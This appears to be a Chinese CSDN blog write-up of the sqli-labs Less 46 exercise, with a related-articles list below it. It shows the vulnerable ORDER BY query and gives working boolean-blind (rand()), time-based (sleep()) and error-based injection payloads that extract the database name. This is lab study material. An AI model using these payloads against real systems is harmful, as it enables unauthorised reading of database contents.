Less 46 (ORDER BY 后的注入)

最新推荐文章于 2024-05-17 08:37:27 发布
最新推荐文章于 2024-05-17 08:37:27 发布
阅读量257 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107577630
版权

文章目录

1. 题目分析

先看一下源码中的SQL

$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";

需要注意的是,此处我们输入的参数应该是?sort=xxx,并且后台没有对这个参数进行过滤。

但是和以往不同的是,我们的注入位置不再是WHERE后面,而是在ORDER BY之后。

目前有2中注入思路:

  1. 利用rand()实现布尔盲注
  2. 时间盲注
  3. 双注入

2. 注入过程

2.1 利用rand()实现布尔盲注

通过输入?sort=1 and 1=2?sort=1 and 1=1,发现页面的数据是没有变化的。

这是因为在order by语句后面直接添加and等逻辑判断,会使得order by语句失效。(原理尚不清楚)

但是,可以利用rand()来实现bool注入。通过实践我们可以发现

select * from users order by rand(True/False);

以上语句中TrueFalse的返回结果是不同的。
在这里插入图片描述
在这里插入图片描述
可以看到返回的顺序是不同的。
True: 11 5 4 3…
False: 1 7 4 12…

那么,我们就可以在rand()里面构造payload

比如,看一下当前所使用的数据库名字:
?sort=rand(ascii(substr(database(),1,1))=115)可以判断出当前数据库的名字的第一个字母是s

2.2 时间盲注

时间盲注的思路,相比于布尔盲注较为简单。

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(0.5),1)

利用上面语句,会发现有网页返回有明显的延迟,因此可以判断出第一个字母为s

2.3 双注入

?sort=(select count(*) from information_schema.schemata group by concat(0x7e,(select database()),floor(rand(0)*2)))

在这里插入图片描述
关于双注入的原理之前也有说过。

老司机开代码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Order by注入
qq_40710190的博客
07-01 4223
MySQL order by注入
SQL注入ORDER BY注入
m0_74834253的博客
02-22 2297
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
SQL注入ORDER BY注入_order by 后面的变量 sql注入
最新发布
2401_84281720的博客
05-17 920
简单来说就是构造报错语句让错误信息中夹杂可以显示数据内容信息,这样通过报错信息来获取我想要的数据。要是注意的是,只用显示报错信息的界面才能使用。为true时会正常时间显示,false时会延迟一段时间显示所以就可以进行盲注了。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。如上可以看出字符串型时if(***)被转化为字符串导致失效,排列顺序不改变而数字型时排列顺序改变。
Sqli-labs Less46-53 order by 后的注入
kevinhanser
08-10 1230
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Oeder By 后的注入 注入原理 ?sort=1 desc ?sort=1 asc 显示结果不同,说明可以注入 desc是 descend 降序意思 asc 是 ascend 升序意思 可利用 order by 后的一些参数进行注入 2.1 order by 后的数字可以...
less-46-47-48-49-50-51-52-53
qq_44598397的博客
04-12 673
LESS-46 1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。) 输入?Sort=1 desc 输入:?Sort=1 asc 两者不同说明这里使用了order by 1、报错注入 输入:http://127...
Sqli-labs 复习 Less46-53 order by 后的注入
kevinhanser
08-12 1140
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 Order By 后的注入 注入原理 测试 ?sort=1 desc--+ ?sort=1 asc--+ 显示结果不同,说明可以注入 desc是 descend 降序意思 asc 是 ascend 升序意思 可利用 order by 后的一...
sql注入之手工注入示例详解
09-10
尝试将数字替换"id"后的值,如`http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4...`。当程序因语法错误而崩溃或返回异常结果时,你可以确定SELECT语句的字段数。例如,如果在`order by 4`时出现问题,那么...
SQL-labs/less1通关教程
02-29
- **测试方法**: 逐步增加`ORDER BY`后的数字,直到出现错误为止。 - **示例**: `?id=1' ORDER BY 3 --+`不会引发错误,而`?id=1' ORDER BY 4 --+`会出现错误,因此可以推断出表中有3列。 #### 四、识别回显点 ...
sqlilabs 75关中文目录
01-11
13. **ORDER BY 分句**:Less-46和Less-47通过ORDER BY子句展示了数值型和字符型的注入,攻击者可以控制查询结果的排序。 这个中文目录为学习者提供了丰富的实战练习,涵盖了SQL注入的各种技术和策略。通过逐个完成...
sqli-labs实验指导手册
11-17
- **确定列数**:通过`order by`语句,增加数字看何时会报错。 - **显示字段定位**:利用`union select`结合不同的列数来确定可显示的字段位置。 - **数据库、表名和列名的暴露**:使用`information_schema`表来...
sqli-labs (less-46)
kukudeshuo的博客
03-15 854
sqli-labs (less-46) 进入46关,这时候我们发现屏幕上的显示的不是再要我们属于ID了,而是要我们输入sort,我们输入sort=1试试 我们发现查询的结果是这样的,那为什么我们输入sort=1会输出这些东西呢,我们可以通过查看源代码看看 这里我们发现sql语句为select * from users order by $id;,在原先的语句上加入了order by语句,那到底order by语句是什么意思呢,前面的关卡我们使用了order by语句,但都是都是为了判断字段数,这里我们来
sqli-Labs————less-46order by 之后的注入
Fly_鹏程万里
05-21 1352
前言从这一关开始将会介绍一下order by相关的注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
Sqli-labs之Less:46-49
m0_46315342的博客
06-04 287
                                          &nbs...
SQL注入 Less46(order by后的注入+rand()布尔盲注)
开心星人的博客
07-30 788
对users表随机进行排序。 rand()返回的是一个0-1的浮点数,order by 后面跟的是列名或列号。 这里其实可以理解成users表中增加了一个rand字段,字段值是随机产生的。根据该rand字段来对users表进行排序。所以就到达了随机排序的效果...
​SQL注入order by注入
qq_68163788的博客
01-30 2096
Order by注入是一种SQL注入攻击的类型,它利用了在SQL查询中使用order by子句来对结果进行排序的漏洞。在正常情况下,order by子句会根据指定的列对结果进行排序,但是如果应用程序没有对用户提供的输入进行正确的验证和过滤,攻击者就可以利用这个漏洞来执行恶意的SQL查询。 通过在order by子句中插入恶意的SQL代码,攻击者可以获取敏感数据、修改数据库内容或者执行其他恶意操作。例如,攻击者可以利用order by注入来发现数据库中的表名、列名或者获取敏感数据。
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1133
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8755
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
SQLi-LABS Less-46到Less-53
m0_64898960的博客
05-11 183
sql注入less23
03-16
在less23中,它是一个用于演示SQL注入的示例网站。在该示例中,存在一个漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来绕过应用程序的验证和过滤机制,从而执行未经授权的数据库操作。 为了防止SQL注入攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值